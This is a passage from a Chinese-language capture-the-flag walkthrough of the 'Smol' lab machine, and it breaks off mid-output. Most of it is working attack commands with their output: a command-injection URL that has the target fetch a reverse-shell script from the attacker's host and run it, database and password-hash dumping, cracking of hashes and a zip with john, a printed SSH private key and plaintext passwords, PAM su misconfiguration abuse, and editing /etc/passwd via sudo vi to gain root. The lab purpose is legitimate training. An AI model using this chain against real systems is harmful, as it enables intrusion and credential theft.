尝试进行执行命令以及反弹shell!!!!
尝试反弹,但是发现执行不了,尝试上传文件进行反弹:
http://www.smol.hmv/wp-admin/index.php?cmd=wget http://192.168.10.101:8888/revshell.sh -O /tmp/revshell.sh
发现请求成功了,尝试执行:
http://www.smol.hmv/wp-admin/index.php?cmd=/bin/bash%20/tmp/revshell.sh
弹过来了!!!!
提权
稳定shell
老样子。。。。
python3 -c 'import pty;pty.spawn("/bin/bash")'
# script /dev/null -c bash
export TERM=xterm
Ctrl + Z
stty raw -echo; fg
# kali stty size
stty rows 44 columns 189
信息搜集
www-data@smol:/var/www/wordpress/wp-admin$ cd ~
www-data@smol:/var/www$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Mar 29 2024 .
drwxr-xr-x 13 root root 4096 Mar 29 2024 ..
drwxr-xr-x 2 root root 4096 Mar 29 2024 html
drwxr-x--- 5 www-data www-data 4096 Jun 7 02:03 wordpress
www-data@smol:/var/www$ cd html
www-data@smol:/var/www/html$ ls -la
total 24
drwxr-xr-x 2 root root 4096 Mar 29 2024 .
drwxr-xr-x 4 root root 4096 Mar 29 2024 ..
-rw-r--r-- 1 root root 10918 Mar 29 2024 index.html.default
-rw-r--r-- 1 root root 258 Mar 29 2024 index.php
www-data@smol:/var/www/html$ cd ../wordpress/
www-data@smol:/var/www/wordpress$ ls -la
total 252
drwxr-x--- 5 www-data www-data 4096 Jun 7 02:03 .
drwxr-xr-x 4 root root 4096 Mar 29 2024 ..
-rw-r--r-- 1 www-data www-data 523 Aug 16 2023 .htaccess
-rw-r--r-- 1 www-data www-data 405 Aug 16 2023 index.php
-rw-r--r-- 1 www-data www-data 19903 Jun 7 02:02 license.txt
-rw-r--r-- 1 www-data www-data 7425 Jun 7 02:02 readme.html
-rw-r--r-- 1 www-data www-data 7387 Jun 7 02:02 wp-activate.php
drwxr-xr-x 9 www-data www-data 4096 Aug 16 2023 wp-admin
-rw-r--r-- 1 www-data www-data 351 Aug 16 2023 wp-blog-header.php
-rw-r--r-- 1 www-data www-data 2323 Aug 16 2023 wp-comments-post.php
-rw-r--r-- 1 www-data www-data 3336 Jun 7 02:02 wp-config-sample.php
-rw-r--r-- 1 www-data www-data 3008 Mar 29 2024 wp-config.php
drwxr-xr-x 8 www-data www-data 4096 Jun 7 02:03 wp-content
-rw-r--r-- 1 www-data www-data 5617 Jun 7 02:02 wp-cron.php
drwxr-xr-x 30 www-data www-data 16384 Jun 7 02:02 wp-includes
-rw-r--r-- 1 www-data www-data 2502 Aug 16 2023 wp-links-opml.php
-rw-r--r-- 1 www-data www-data 3937 Jun 7 02:02 wp-load.php
-rw-r--r-- 1 www-data www-data 51414 Jun 7 02:02 wp-login.php
-rw-r--r-- 1 www-data www-data 8727 Jun 7 02:02 wp-mail.php
-rw-r--r-- 1 www-data www-data 30081 Jun 7 02:02 wp-settings.php
-rw-r--r-- 1 www-data www-data 34516 Jun 7 02:02 wp-signup.php
-rw-r--r-- 1 www-data www-data 5102 Jun 7 02:02 wp-trackback.php
-rw-r--r-- 1 www-data www-data 3205 Jun 7 02:02 xmlrpc.php
www-data@smol:/var/www/wordpress$ cat /etc/passwd | grep sh | cut -d: -f1
root
sshd
think
fwupd-refresh
xavi
diego
gege
www-data@smol:/var/www/wordpress$ ls -la /home/
total 24
drwxr-xr-x 6 root root 4096 Aug 16 2023 .
drwxr-xr-x 18 root root 4096 Mar 29 2024 ..
drwxr-x--- 2 diego internal 4096 Aug 18 2023 diego
drwxr-x--- 2 gege internal 4096 Aug 18 2023 gege
drwxr-x--- 5 think internal 4096 Jan 12 2024 think
drwxr-x--- 2 xavi internal 4096 Aug 18 2023 xavi
数据库泄露
尝试看一下数据库:
www-data@smol:/var/www/wordpress$ mysql -u wpuser -pkbLSF2Vop#lw3rjDZ629*Z%G
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 524
Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2024, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| wordpress |
+--------------------+
5 rows in set (0.00 sec)
mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from wp_users;
+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
| 1 | admin | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0 | admin | admin@smol.thm | http://www.smol.hmv | 2023-08-16 06:58:30 | | 0 | admin |
| 2 | wpuser | $wp$2y$10$r/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m | wp | wp@smol.thm | http://smol.thm | 2023-08-16 11:04:07 | | 0 | wordpress user |
| 3 | think | $P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/ | think | josemlwdf@smol.thm | http://smol.thm | 2023-08-16 15:01:02 | | 0 | Jose Mario Llado Marti |
| 4 | gege | $P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1 | gege | gege@smol.thm | http://smol.thm | 2023-08-17 20:18:50 | | 0 | gege |
| 5 | diego | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1 | diego | diego@smol.thm | http://smol.thm | 2023-08-17 20:19:15 | | 0 | diego |
| 6 | xavi | $P$BvcalhsCfVILp2SgttADny40mqJZCN/ | xavi | xavi@smol.thm | http://smol.thm | 2023-08-17 20:20:01 | | 0 | xavi |
+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
6 rows in set (0.00 sec)
mysql> select user_nicename,user_login,user_pass from wp_users;
+---------------+------------+-----------------------------------------------------------------+
| user_nicename | user_login | user_pass |
+---------------+------------+-----------------------------------------------------------------+
| admin | admin | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0 |
| wp | wpuser | $wp$2y$10$r/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m |
| think | think | $P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/ |
| gege | gege | $P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1 |
| diego | diego | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1 |
| xavi | xavi | $P$BvcalhsCfVILp2SgttADny40mqJZCN/ |
+---------------+------------+-----------------------------------------------------------------+
6 rows in set (0.00 sec)
尝试进行破译:
admin:$P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0
wpuser:$wp$2y$10$r/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m
think:$P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/
gege:$P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1
diego:$P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1
xavi:$P$BvcalhsCfVILp2SgttADny40mqJZCN/
┌──(kali💀kali)-[~/temp/Smol]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (phpass [phpass ($P$ or $H$) 128/128 SSE2 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sandiegocalifornia (diego)
1g 0:00:43:32 42.46% (ETA: 04:19:56) 0.000382g/s 2372p/s 9992c/s 9992C/s lilmami503..lilmama_c
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session aborted
破解即可拿到密码:diego:sandiegocalifornia
,尽管开启了ssh服务,但是禁止登录。。。。
相同组权限读取凭证切换用户
diego@smol:~$ ls -la
total 24
drwxr-x--- 2 diego internal 4096 Aug 18 2023 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Aug 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 diego diego 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 diego diego 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 diego diego 807 Feb 25 2020 .profile
-rw-r--r-- 1 root root 33 Aug 16 2023 user.txt
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
diego@smol:~$ cat user.txt
45edaec653ff9ee06236b7ce72b86963
diego@smol:~$ sudo -l
[sudo] password for diego:
Sorry, user diego may not run sudo on smol.
diego@smol:~$ whoami;id
diego
uid=1002(diego) gid=1002(diego) groups=1002(diego),1005(internal)
diego@smol:~$ ls -la ../
total 24
drwxr-xr-x 6 root root 4096 Aug 16 2023 .
drwxr-xr-x 18 root root 4096 Mar 29 2024 ..
drwxr-x--- 2 diego internal 4096 Aug 18 2023 diego
drwxr-x--- 2 gege internal 4096 Aug 18 2023 gege
drwxr-x--- 5 think internal 4096 Jan 12 2024 think
drwxr-x--- 2 xavi internal 4096 Aug 18 2023 xavi
之前注意到四个相同组权限的用户,尝试看一下有没有有效信息:
diego@smol:~$ cd ../gege
diego@smol:/home/gege$ ls -la
total 31532
drwxr-x--- 2 gege internal 4096 Aug 18 2023 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Aug 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 gege gege 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 gege gege 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 gege gege 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
-rwxr-x--- 1 root gege 32266546 Aug 16 2023 wordpress.old.zip
diego@smol:/home/gege$ cd ../think
diego@smol:/home/think$ ls -la
total 32
drwxr-x--- 5 think internal 4096 Jan 12 2024 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Jun 21 2023 .bash_history -> /dev/null
-rw-r--r-- 1 think think 220 Jun 2 2023 .bash_logout
-rw-r--r-- 1 think think 3771 Jun 2 2023 .bashrc
drwx------ 2 think think 4096 Jan 12 2024 .cache
drwx------ 3 think think 4096 Aug 18 2023 .gnupg
-rw-r--r-- 1 think think 807 Jun 2 2023 .profile
drwxr-xr-x 2 think think 4096 Jun 21 2023 .ssh
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
diego@smol:/home/think$ cd .ssh
diego@smol:/home/think/.ssh$ ls -la
total 20
drwxr-xr-x 2 think think 4096 Jun 21 2023 .
drwxr-x--- 5 think internal 4096 Jan 12 2024 ..
-rwxr-xr-x 1 think think 572 Jun 21 2023 authorized_keys
-rwxr-xr-x 1 think think 2602 Jun 21 2023 id_rsa
-rwxr-xr-x 1 think think 572 Jun 21 2023 id_rsa.pub
diego@smol:/home/think/.ssh$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
diego@smol:/home/think/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEa2hCNjk1TKa4P7dvTHMRgiF0FuyeJyuue+QyM6B1unzFgqt86Ax6GuSsReNyqasW9nOnSGdWdtoLJRXy8OvLCysSK8rt3kgN5+ywf9GpGKc5jcURgT56TMqgf5Lr6M0Qp50wfsNqYuxfGwAblv8C+b4Wlaa83XJLmxN4J5hTTCwcw/5x8zVxhwOQNToeaIIDYbgPn64+W5IfXdNLXYmkXJTcSMdC9Xp68RF5yuIdJ9XQ/EyuvAkTI7BI9gDZztGViH61tueJBFUAYTQlq2juSoAk4pki5ccQgqEGcU4i3knmynqX9B9fFlhEwFqK7I2205jVvI3CPr8QTJB7VgzlyGG2Ymb9FaiDxToNl/wGAHYqhU3uTXVUbvj5yYUxsY/rGfWZAbqLa7cfpZxjUsBzQnVuHKkaw89wTTr3fiz2OsqI31eT0EbscKcOFjYDpsLpuIThSp9TeKQ1BkxfAK8Xy9gcPjN06BpQzw+qL3RYIYRwY+1N9b9097j5eipmZxU= think@ubuntuserver
diego@smol:/home/think/.ssh$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEa2hCNjk1TKa4P7dvTHMRgiF0FuyeJyuue+QyM6B1unzFgqt86Ax6GuSsReNyqasW9nOnSGdWdtoLJRXy8OvLCysSK8rt3kgN5+ywf9GpGKc5jcURgT56TMqgf5Lr6M0Qp50wfsNqYuxfGwAblv8C+b4Wlaa83XJLmxN4J5hTTCwcw/5x8zVxhwOQNToeaIIDYbgPn64+W5IfXdNLXYmkXJTcSMdC9Xp68RF5yuIdJ9XQ/EyuvAkTI7BI9gDZztGViH61tueJBFUAYTQlq2juSoAk4pki5ccQgqEGcU4i3knmynqX9B9fFlhEwFqK7I2205jVvI3CPr8QTJB7VgzlyGG2Ymb9FaiDxToNl/wGAHYqhU3uTXVUbvj5yYUxsY/rGfWZAbqLa7cfpZxjUsBzQnVuHKkaw89wTTr3fiz2OsqI31eT0EbscKcOFjYDpsLpuIThSp9TeKQ1BkxfAK8Xy9gcPjN06BpQzw+qL3RYIYRwY+1N9b9097j5eipmZxU= think@ubuntuserver
diego@smol:/home/think/.ssh$ cd ../../xavi/
diego@smol:/home/xavi$ ls -la
total 20
drwxr-x--- 2 xavi internal 4096 Aug 18 2023 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Aug 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 xavi xavi 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 xavi xavi 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 xavi xavi 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
找到了一个备份以及一个可供ssh凭证登录的用户,先登录上去再说吧:
su配置文件无密码切换
信息搜集发现:
think@smol:~$ ls -la
total 32
drwxr-x--- 5 think internal 4096 Jan 12 2024 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Jun 21 2023 .bash_history -> /dev/null
-rw-r--r-- 1 think think 220 Jun 2 2023 .bash_logout
-rw-r--r-- 1 think think 3771 Jun 2 2023 .bashrc
drwx------ 2 think think 4096 Jan 12 2024 .cache
drwx------ 3 think think 4096 Aug 18 2023 .gnupg
-rw-r--r-- 1 think think 807 Jun 2 2023 .profile
drwxr-xr-x 2 think think 4096 Jun 21 2023 .ssh
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
think@smol:~$ whoami;id
think
uid=1000(think) gid=1000(think) groups=1000(think),1004(dev),1005(internal)
think@smol:~$ cat /etc/group | grep dev
plugdev:x:46:
dev:x:1004:think,gege
think@smol:~$ cd ../gege
think@smol:/home/gege$ ls -la
total 31532
drwxr-x--- 2 gege internal 4096 Aug 18 2023 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Aug 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 gege gege 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 gege gege 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 gege gege 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
-rwxr-x--- 1 root gege 32266546 Aug 16 2023 wordpress.old.zip
think
和gege
用户属于同一个组权限范围内,这里估计就是要从think
跳到gege
中进行操作,但是没啥头绪,上传一个linpeas.sh
进行扫描。。。但是没发现啥大鱼,看了一些师傅的wp,发现这里可以直接进行切换,看来是修改了配置文件,看一下:
think@smol:/tmp$ cat /etc/pam.d/su | grep auth
auth sufficient pam_rootok.so
auth [success=ignore default=1] pam_succeed_if.so user = gege
auth sufficient pam_succeed_if.so use_uid user = think
# auth required pam_wheel.so
# auth sufficient pam_wheel.so trust
# auth required pam_wheel.so deny group=nosu
# The standard Unix authentication modules, used with
@include common-auth
说明think
是被信任的用户,切换:
破解备份文件
把文件传到本地看看备份了些啥,但是解压的时候发现是需要密码的。。。。尝试破解一下:
┌──(kali💀kali)-[~/temp/Smol]
└─$ zip2john wordpress.old.zip > ziphash
-----------
┌──(kali💀kali)-[~/temp/Smol]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt ziphash
[sudo] password for kali:
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hero_gege@hotmail.com (wordpress.old.zip)
1g 0:00:00:01 DONE (2025-06-07 03:22) 0.5649g/s 4306Kp/s 4306Kc/s 4306KC/s hesse..hermosa_jessy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
知道密码即可进行解压:
┌──(kali💀kali)-[~/temp/Smol]
└─$ ll
total 31544
-rw-r--r-- 1 kali kali 4571 Jun 6 22:13 cms.log
-rw-rw-r-- 1 kali kali 274 Jun 7 02:37 hash
-rw------- 1 kali kali 2602 Jun 7 02:52 id_rsa
-rw-r--r-- 1 kali kali 517 Jun 6 22:13 reports.json
drwxr-xr-x 4 kali kali 4096 Jun 6 22:06 Result
-rw-rw-r-- 1 kali kali 50 Jun 7 01:17 revshell.sh
-rw-rw-r-- 1 kali kali 32266546 Aug 16 2023 wordpress.old.zip
-rw-rw-r-- 1 kali kali 1192 Jun 7 03:19 ziphash
┌──(kali💀kali)-[~/temp/Smol]
└─$ unzip wordpress.old.zip
Archive: wordpress.old.zip
creating: wordpress.old/
[wordpress.old.zip] wordpress.old/wp-config.php password:
inflating: wordpress.old/wp-config.php
inflating: wordpress.old/index.php
inflating: wordpress.old/wp-comments-post.php
inflating: wordpress.old/xmlrpc.php
inflating: wordpress.old/license.txt
inflating: wordpress.old/wp-login.php
creating: wordpress.old/wp-content/
extracting: wordpress.old/wp-content/index.php
creating: wordpress.old/wp-content/plugins/
----------------
inflating: wordpress.old/wp-admin/export.php
inflating: wordpress.old/wp-admin/options-writing.php
inflating: wordpress.old/wp-admin/users.php
inflating: wordpress.old/wp-admin/options-media.php
inflating: wordpress.old/wp-admin/edit.php
inflating: wordpress.old/wp-admin/import.php
inflating: wordpress.old/wp-admin/revision.php
进行搜索发现比较敏感的配置文件:
┌──(kali💀kali)-[~/temp/Smol]
└─$ cd wordpress.old
┌──(kali💀kali)-[~/temp/Smol/wordpress.old]
└─$ ll
total 228
-rw-r--r-- 1 kali kali 405 Aug 16 2023 index.php
-rw-r--r-- 1 kali kali 19915 Aug 16 2023 license.txt
-rw-r--r-- 1 kali kali 7399 Aug 16 2023 readme.html
-rw-r--r-- 1 kali kali 7211 Aug 16 2023 wp-activate.php
drwxr-xr-x 9 kali kali 4096 Aug 16 2023 wp-admin
-rw-r--r-- 1 kali kali 351 Aug 16 2023 wp-blog-header.php
-rw-r--r-- 1 kali kali 2323 Aug 16 2023 wp-comments-post.php
-rw-r--r-- 1 kali kali 2994 Aug 16 2023 wp-config.php
drwxr-xr-x 7 kali kali 4096 Aug 16 2023 wp-content
-rw-r--r-- 1 kali kali 5638 Aug 16 2023 wp-cron.php
drwxr-xr-x 27 kali kali 12288 Aug 16 2023 wp-includes
-rw-r--r-- 1 kali kali 2502 Aug 16 2023 wp-links-opml.php
-rw-r--r-- 1 kali kali 3927 Aug 16 2023 wp-load.php
-rw-r--r-- 1 kali kali 49441 Aug 16 2023 wp-login.php
-rw-r--r-- 1 kali kali 8537 Aug 16 2023 wp-mail.php
-rw-r--r-- 1 kali kali 25602 Aug 16 2023 wp-settings.php
-rw-r--r-- 1 kali kali 34385 Aug 16 2023 wp-signup.php
-rw-r--r-- 1 kali kali 4885 Aug 16 2023 wp-trackback.php
-rw-r--r-- 1 kali kali 3236 Aug 16 2023 xmlrpc.php
┌──(kali💀kali)-[~/temp/Smol/wordpress.old]
└─$ cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/documentation/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** Database username */
define( 'DB_USER', 'xavi' );
/** Database password */
define( 'DB_PASSWORD', 'P@ssw0rdxavi@' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/documentation/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', true );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
得到新的凭证:
xavi
P@ssw0rdxavi@
进行切换:
编辑/etc/passwd获取rootshell
xavi@smol:~$ sudo -l
[sudo] password for xavi:
Matching Defaults entries for xavi on smol:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User xavi may run the following commands on smol:
(ALL : ALL) /usr/bin/vi /etc/passwd
发现可以编辑/etc/passwd
文件,添加凭证进行添加高权限用户,或是直接使用vi
的命令模式获取shell皆可:
vi的命令模式
添加高权限用户
添加一个root
权限的用户也很好,感觉这是作者想考的,或是把root密码置空root::0:0:root:/root:/usr/bin/bash
:
┌──(kali💀kali)-[~/temp/Smol/wordpress.old]
└─$ openssl passwd -1 -salt kali kali
$1$kali$/rLA3oVIdYGokOY9m1jKj.
root@smol:/home/xavi$ cd ~
root@smol:~$ ls -la
total 64K
drwx------ 7 root root 4.0K Jun 7 07:34 .
drwxr-xr-x 18 root root 4.0K Mar 29 2024 ..
lrwxrwxrwx 1 root root 9 Jun 2 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.2K Jun 21 2023 .bashrc
drwx------ 2 root root 4.0K Jun 2 2023 .cache
-rw------- 1 root root 35 Mar 29 2024 .lesshst
drwxr-xr-x 3 root root 4.0K Jun 21 2023 .local
lrwxrwxrwx 1 root root 9 Aug 18 2023 .mysql_history -> /dev/null
drwxr-xr-x 4 root root 4.0K Aug 16 2023 .phpbrew
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r----- 1 root root 33 Aug 16 2023 root.txt
-rw-r--r-- 1 root root 75 Aug 17 2023 .selected_editor
drwx------ 3 root root 4.0K Jun 21 2023 snap
drwx------ 2 root root 4.0K Jun 2 2023 .ssh
-rw-rw-rw- 1 root root 13K Jun 7 07:34 .viminfo
root@smol:~$ cat root.txt
bf89ea3ea01992353aef1f576214d4e4
其他尝试
突然想起来群主之前提到过wordpress
有一处信息泄露:
┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s http://www.smol.hmv/index.php/wp-json/WP/V2/users/1 | jq
{
"id": 1,
"name": "admin",
"url": "http://www.smol.hmv",
"description": "",
"link": "http://www.smol.hmv/index.php/author/admin/",
"slug": "admin",
"avatar_urls": {
"24": "https://secure.gravatar.com/avatar/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=24&d=monsterid&r=g",
